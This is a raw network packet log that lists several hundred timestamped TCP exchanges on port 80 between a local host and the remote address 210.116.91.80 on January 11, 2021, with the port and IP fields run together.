      Jan 11, 2021 17:55:34.679092884 CET4983380192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:34.934371948 CET8049832210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:34.951106071 CET8049833210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:34.952344894 CET4983380192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:34.952838898 CET4983380192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:35.225420952 CET8049833210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:35.225646973 CET4983380192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:35.225796938 CET4983380192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:35.341042042 CET4983480192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:35.574760914 CET8049833210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:35.604696035 CET8049834210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:35.604825020 CET4983480192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:35.605334044 CET4983480192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:35.869436979 CET8049834210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:35.869550943 CET4983480192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:35.869671106 CET4983480192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:35.872803926 CET4983580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:36.132889986 CET8049834210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:36.132968903 CET8049835210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:36.133182049 CET4983580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:36.134080887 CET4983580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:36.395581007 CET8049835210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:36.397023916 CET4983580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:36.397160053 CET4983580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:36.401016951 CET4983680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:36.657239914 CET8049835210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:36.663042068 CET8049836210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:36.665313005 CET4983680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:36.665828943 CET4983680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:36.928248882 CET8049836210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:36.929294109 CET4983680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:36.929415941 CET4983680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:37.045641899 CET4983780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:37.191214085 CET8049836210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:37.308732986 CET8049837210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:37.309031010 CET4983780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:37.310312033 CET4983780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:37.573709965 CET8049837210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:37.573846102 CET4983780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:37.573967934 CET4983780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:37.577106953 CET4983880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:37.836532116 CET8049837210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:37.849237919 CET8049838210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:37.849529982 CET4983880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:37.850020885 CET4983880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:38.122589111 CET8049838210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:38.122783899 CET4983880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:38.122987986 CET4983880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:38.126389980 CET4983980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:38.392607927 CET8049839210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:38.392723083 CET4983980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:38.393255949 CET4983980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:38.396466970 CET8049838210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:38.658394098 CET8049839210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:38.658526897 CET4983980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:38.663451910 CET4983980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:38.783876896 CET4984080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:38.931197882 CET8049839210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:39.046485901 CET8049840210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:39.047636986 CET4984080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:39.049812078 CET4984080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:39.309412956 CET8049840210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:39.309593916 CET4984080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:39.309886932 CET4984080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:39.317619085 CET4984180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:39.568535089 CET8049840210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:39.577362061 CET8049841210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:39.577708960 CET4984180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:39.579063892 CET4984180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:39.839138985 CET8049841210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:39.839343071 CET4984180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:39.839644909 CET4984180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:39.846771955 CET4984280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:40.098978996 CET8049841210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:40.107568026 CET8049842210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:40.107707977 CET4984280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:40.108448029 CET4984280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:40.369780064 CET8049842210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:40.370013952 CET4984280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:40.370248079 CET4984280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:40.486428022 CET4984580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:40.630790949 CET8049842210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:40.745212078 CET8049845210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:40.745321989 CET4984580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:40.754378080 CET4984580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:41.013569117 CET8049845210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:41.013708115 CET4984580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:41.014010906 CET4984580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:41.021637917 CET4984680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:41.273015976 CET8049845210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:41.293292046 CET8049846210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:41.293421030 CET4984680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:41.293981075 CET4984680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:41.566473007 CET8049846210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:41.566577911 CET4984680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:41.566695929 CET4984680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:41.573375940 CET4984780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:41.837999105 CET8049846210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:41.841455936 CET8049847210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:41.841563940 CET4984780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:41.845242977 CET4984780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:42.114115953 CET8049847210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:42.114268064 CET4984780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:42.114525080 CET4984780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:42.238405943 CET4984880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:42.382571936 CET8049847210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:42.498541117 CET8049848210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:42.498802900 CET4984880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:42.500201941 CET4984880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:42.760907888 CET8049848210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:42.761053085 CET4984880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:42.761394024 CET4984880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:42.769455910 CET4984980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:43.021112919 CET8049848210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:43.032430887 CET8049849210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:43.032809973 CET4984980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:43.033344984 CET4984980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:43.296571016 CET8049849210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:43.296854019 CET4984980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:43.297125101 CET4984980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:43.304631948 CET4985080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:43.559518099 CET8049849210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:43.564583063 CET8049850210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:43.565450907 CET4985080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:43.566813946 CET4985080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:43.826807022 CET8049850210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:43.826894045 CET4985080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:43.827040911 CET4985080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:43.936311960 CET4985180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:44.086352110 CET8049850210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:44.199177027 CET8049851210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:44.199300051 CET4985180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:44.199999094 CET4985180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:44.463160992 CET8049851210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:44.463238955 CET4985180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:44.463500977 CET4985180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:44.469631910 CET4985280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:44.725794077 CET8049851210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:44.729441881 CET8049852210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:44.729697943 CET4985280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:44.730411053 CET4985280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:44.990772009 CET8049852210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:44.991022110 CET4985280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:44.991175890 CET4985280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:44.996723890 CET4985380192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:45.250773907 CET8049852210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:45.257251978 CET8049853210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:45.257471085 CET4985380192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:45.259469986 CET4985380192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:45.522773027 CET8049853210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:45.523031950 CET4985380192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:45.523333073 CET4985380192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:45.644433022 CET4985480192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:45.783920050 CET8049853210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:45.907670975 CET8049854210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:45.909279108 CET4985480192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:45.909315109 CET4985480192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:46.173079967 CET8049854210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:46.173358917 CET4985480192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:46.173387051 CET4985480192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:46.177891016 CET4985580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:46.436315060 CET8049854210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:46.441545010 CET8049855210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:46.441802979 CET4985580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:46.442652941 CET4985580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:46.706830025 CET8049855210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:46.707000017 CET4985580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:46.707089901 CET4985580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:46.710877895 CET4985680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:46.970396042 CET8049855210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:46.972152948 CET8049856210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:46.972254038 CET4985680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:46.973223925 CET4985680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:47.235138893 CET8049856210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:47.237176895 CET4985680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:47.237313032 CET4985680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:47.358846903 CET4985780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:47.498244047 CET8049856210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:47.618851900 CET8049857210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:47.622323990 CET4985780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:47.623301983 CET4985780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:47.884114981 CET8049857210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:47.886301041 CET4985780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:47.886459112 CET4985780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:47.890538931 CET4985880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:48.146280050 CET8049857210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:48.152108908 CET8049858210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:48.152209044 CET4985880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:48.153604984 CET4985880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:48.416039944 CET8049858210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:48.416168928 CET4985880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:48.416484118 CET4985880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:48.419768095 CET4985980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:48.677737951 CET8049858210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:48.681345940 CET8049859210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:48.681472063 CET4985980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:48.682172060 CET4985980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:48.944469929 CET8049859210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:48.947083950 CET4985980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:48.947458982 CET4985980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:49.062166929 CET4986080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:49.209487915 CET8049859210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:49.321368933 CET8049860210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:49.321583986 CET4986080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:49.322773933 CET4986080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:49.582149029 CET8049860210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:49.582273006 CET4986080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:49.582433939 CET4986080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:49.586963892 CET4986180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:49.842816114 CET8049860210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:49.850203991 CET8049861210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:49.850297928 CET4986180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:49.851074934 CET4986180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:50.115175962 CET8049861210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:50.115272999 CET4986180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:50.115413904 CET4986180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:50.142178059 CET4986480192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:50.378385067 CET8049861210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:50.401346922 CET8049864210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:50.401823044 CET4986480192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:50.402518034 CET4986480192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:50.662182093 CET8049864210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:50.662410021 CET4986480192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:50.662565947 CET4986480192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:50.779431105 CET4986680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:50.921406031 CET8049864210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:51.045588970 CET8049866210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:51.046693087 CET4986680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:51.047215939 CET4986680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:51.313611031 CET8049866210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:51.313767910 CET4986680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:51.313944101 CET4986680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:51.317042112 CET4986780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:51.579536915 CET8049866210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:51.580530882 CET8049867210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:51.580760002 CET4986780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:51.581322908 CET4986780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:51.847165108 CET8049867210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:51.847311020 CET4986780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:51.847434998 CET4986780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:51.852812052 CET4986880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:52.110733032 CET8049867210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:52.113563061 CET8049868210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:52.114042044 CET4986880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:52.114242077 CET4986880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:52.375633955 CET8049868210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:52.375730038 CET4986880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:52.377332926 CET4986880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:52.482727051 CET4986980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:52.637859106 CET8049868210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:52.750591993 CET8049869210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:52.755506039 CET4986980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:52.756196976 CET4986980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:53.025325060 CET8049869210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:53.025634050 CET4986980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:53.025897980 CET4986980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:53.029375076 CET4987580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:53.290903091 CET8049875210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:53.291014910 CET4987580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:53.292113066 CET4987580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:53.293271065 CET8049869210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:53.554802895 CET8049875210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:53.554913998 CET4987580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:53.555062056 CET4987580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:53.559313059 CET4987680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:53.817409992 CET8049875210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:53.822448015 CET8049876210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:53.822623968 CET4987680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:53.823312044 CET4987680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:54.087682962 CET8049876210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:54.087874889 CET4987680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:54.088342905 CET4987680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:54.203191042 CET4987780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:54.350549936 CET8049876210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:54.461226940 CET8049877210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:54.461347103 CET4987780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:54.462141037 CET4987780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:54.720748901 CET8049877210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:54.720978975 CET4987780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:54.721013069 CET4987780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:54.724231958 CET4987880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:54.978816986 CET8049877210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:54.987998009 CET8049878210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:54.989403963 CET4987880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:54.989450932 CET4987880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:55.253542900 CET8049878210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:55.253803968 CET4987880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:55.254053116 CET4987880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:55.261866093 CET4987980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:55.517446041 CET8049878210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:55.523053885 CET8049879210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:55.525118113 CET4987980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:55.525911093 CET4987980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:55.787642002 CET8049879210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:55.787745953 CET4987980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:55.787988901 CET4987980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:55.905627012 CET4988080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:56.049066067 CET8049879210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:56.168629885 CET8049880210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:56.169364929 CET4988080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:56.170101881 CET4988080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:56.433552980 CET8049880210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:56.433877945 CET4988080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:56.434037924 CET4988080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:56.438601017 CET4988180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:56.696310043 CET8049880210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:56.696485996 CET8049881210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:56.700223923 CET4988180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:56.700265884 CET4988180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:56.958790064 CET8049881210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:56.958957911 CET4988180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:56.959181070 CET4988180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:56.966623068 CET4988280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:57.217245102 CET8049881210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:57.226322889 CET8049882210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:57.227089882 CET4988280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:57.228408098 CET4988280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:57.488831043 CET8049882210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:57.491317987 CET4988280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:57.491381884 CET4988280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:57.608377934 CET4988380192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:57.750951052 CET8049882210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:57.868277073 CET8049883210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:57.869842052 CET4988380192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:57.871535063 CET4988380192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:58.131800890 CET8049883210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:58.131989956 CET4988380192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:58.199094057 CET4988380192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:58.202208996 CET4988480192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:58.463682890 CET8049883210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:58.466751099 CET8049884210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:58.466878891 CET4988480192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:58.467463970 CET4988480192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:58.729218960 CET8049884210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:58.729414940 CET4988480192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:58.729847908 CET4988480192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:58.732681990 CET4988580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:58.990680933 CET8049884210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:58.995944977 CET8049885210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:58.996145010 CET4988580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:59.168667078 CET4988580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:59.432661057 CET8049885210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:59.432770967 CET4988580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:59.433463097 CET4988580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:59.696599960 CET8049885210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:00.059801102 CET4988680192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:00.319974899 CET8049886210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:00.320099115 CET4988680192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:00.321032047 CET4988680192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:00.581624031 CET8049886210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:00.581716061 CET4988680192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:00.581898928 CET4988680192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:00.585007906 CET4988780192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:00.841540098 CET8049886210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:00.841726065 CET8049887210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:00.841907978 CET4988780192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:00.842541933 CET4988780192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:01.100214005 CET8049887210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:01.103564978 CET4988780192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:01.103658915 CET4988780192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:01.107798100 CET4988880192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:01.360558033 CET8049887210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:01.370059967 CET8049888210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:01.373708010 CET4988880192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:01.374209881 CET4988880192.168.2.4210.116.91.80
